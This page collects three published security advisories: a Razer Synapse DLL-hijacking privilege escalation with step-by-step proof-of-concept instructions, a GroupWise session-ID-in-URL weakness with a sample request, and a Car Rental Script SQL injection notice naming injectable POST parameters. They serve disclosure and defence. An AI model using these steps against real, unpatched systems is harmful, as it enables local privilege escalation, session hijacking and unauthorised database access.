<pre><code><br />Advisory ID: SYSS-2022-047<br />Product: Razer Synapse<br />Manufacturer: Razer Inc.<br />Affected Version(s): Versions before 3.7.0830.081906<br />Tested Version(s): 3.7.0731.072516<br />Vulnerability Type: Improper Certificate Validation (CWE-295)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2022-08-02<br />Solution Date: 2022-09-06<br />Public Disclosure: 2022-12-21<br />CVE Reference: CVE-2022-47632<br />Author of Advisory: Dr. Oliver Schwarz, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Razer Synapse is an additional driver software for Razer gaming devices.<br />The manufacturer describes the product as a "unified cloud-based hardware<br />configuration tool" (see [1]).<br /><br />Due to an unsafe installation path, improper privilege management, and<br />improper certificate validation, the associated system service<br />"Razer Synapse Service" is vulnerable to DLL hijacking.<br />As a result, local Windows users can abuse the Razer driver installer<br />to obtain administrative privileges on Windows.<br /><br />In order to exploit the vulnerability, the attacker needs physical<br />access to the machine and needs to prepare the attack before Razer<br />Synapse is installed along with a Razer driver.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The attack scenario considers a Windows machine without any previous<br />installation of any Razer device or software.<br />The attacker has a local unprivileged Windows account, physical access<br />to the machine, and a device which is either a Razer peripheral or able<br />to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero).<br />The attacker aims at executing code with full system privileges.<br /><br />The attack exploits the Razer Synapse Service which runs with elevated<br />privileges. While the main binary of the service is stored in the<br />protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it<br />dynamically loads libraries from<br />"C:\ProgramData\Razer\Synapse3\Service\bin".<br />Before the installation, standard users can write to this path, since<br />"C:\ProgramData" is world-writable on a standard installation of Windows.<br /><br />The Synapse installation procedure changes access privileges, so that<br />standard users cannot write to the path any longer.<br />However, if the path is created before the driver installation, the<br />creator can set own files to be read-only and deny write access for<br />the SYSTEM user.<br /><br />Upon start, the Synapse service checks the location for foreign DLLs,<br />removes them and aborts upon failure to delete them.<br />Nevertheless, the DLL check is simply based on verifying if the DLL is<br />associated with ANY certificate information. The service does not<br />verify if the certificate is actually valid or belongs to Razer.<br /><br />Note that the described vulnerability is similar to CVE-2021-44226,<br />which has been fixed in Synapse version 3.7.0228.022817.<br />The new attack differs from the original one in that the attacker<br />now has to employ self-signed DLLs instead of non-signed ones.<br /><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The attack consists of the following steps:<br /><br />1. Before the installation of the driver/Synapse, the attacker creates<br /> "C:\ProgramData\Razer\Synapse3\Service", copies a custom/malicious<br /> and self-signed version of userenv.dll into the directory, sets the<br /> DLL to read-only, and denies write access for SYSTEM.<br /><br />2. Afterwards, the attacker triggers the installation of Synapse.<br /> This can be done without any elevated privileges by plugging in a<br /> Razer device and following the installation procedure for Synapse<br /> if device-specific co-installers are not disabled.<br /> Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero<br /> can be used and pretend to be a Razer device.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Razer has published a patched version that will be deployed automatically<br />upon driver installation on current Windows builds.<br /><br />To prevent similar attacks through other co-installers, system<br />administrators can disable them by setting the following key in the<br />Windows registry:<br /><br />HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device <br />Installer\DisableCoInstallers = 1<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-06-02: Vulnerability discovered<br />2022-08-02: Vulnerability reported to manufacturer<br />2022-09-06: Patch released by manufacturer<br />2022-12-21: Public disclosure of vulnerability<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Razer Synapse 3<br /> https://www2.razer.com/eu-en/synapse-3<br />[2] SySS Security Advisory SYSS-2022-047<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-047.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH.<br /><br />E-Mail: oliver.schwarz@syss.de<br />Public Key: <br />https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc<br />Key ID: 0x9716294F1294280D<br />Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code># Trovent Security Advisory 2203-01 #<br />#####################################<br /><br /><br />Micro Focus GroupWise transmits session ID in URL<br />#################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2203-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2203-01<br />Affected product: Micro Focus GroupWise<br />Affected version: prior to 18.4.2<br />Vendor: Micro Focus, https://www.microfocus.com<br />Credits: Trovent Security GmbH, Stefan Pietsch<br /><br /><br />Detailed description<br />####################<br /><br />Micro Focus GroupWise is a messaging software for email and personal information<br />management.<br />Trovent Security GmbH discovered that the GroupWise web application transmits<br />the session ID in HTTP GET requests in the URL when email content is accessed.<br />The exposed session ID can be recorded in the browser history of the client and<br />in log files of the web server or reverse proxy server.<br />A possible attacker with access to the browser history or the server log files<br />is able to take control of the user session with the help of the session ID.<br /><br />Severity: Medium<br />CVSS Score: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br />CVE ID: CVE-2022-38756<br />CWE ID: CWE-598<br /><br /><br />Proof of concept<br />################<br /><br />Simplified HTTP request:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />GET /attachment?session=<SESSIONID>&id=... HTTP/1.1<br />Host: <HOSTNAME><br />...<br />X-User-Agent: GroupWise Web (18.4.0-139604)<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />The vendor released a fixed version of GroupWise.<br /><br />Fixed in version 18.4.2.<br /><br /><br />History<br />#######<br /><br />2022-03-30: Vulnerability found<br />2022-08-05: Vendor contacted<br />2022-10-31: Contacted vendor again<br />2022-11-01: Vendor replied that the vulnerability will be investigated<br />2022-11-14: Vendor contacted, asking for status<br />2022-11-16: Vendor replied that a security bulletin is being prepared<br />2022-12-06: Vendor published security bulletin<br />2023-01-27: Advisory published<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Car Rental Script 3.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br /><br />POST parameter 'hour_from' is vulnerable to SQLI<br /><br />POST parameter 'minutes_to' is vulnerable to SQLI<br /><br />date_from=27.01.2023&hour_from=[INJECT-HERE]&minutes_from=00&date_to=28.01.2023&hour_to=09&minutes_to=[INJECT-HERE]&pickup_id=4&same_location=1<br /><br /><br />POST parameter 'col_name' is vulnerable to SQLI<br /><br />index.php?controller=pjFront&action=pjActionLoadCars&session_id=9j5lonhuljjtcpff7l1qjq5a85&type_id=all&transmission=&col_name=total_price&direction=asc<br /><br /><br />[-] Done<br /></code></pre>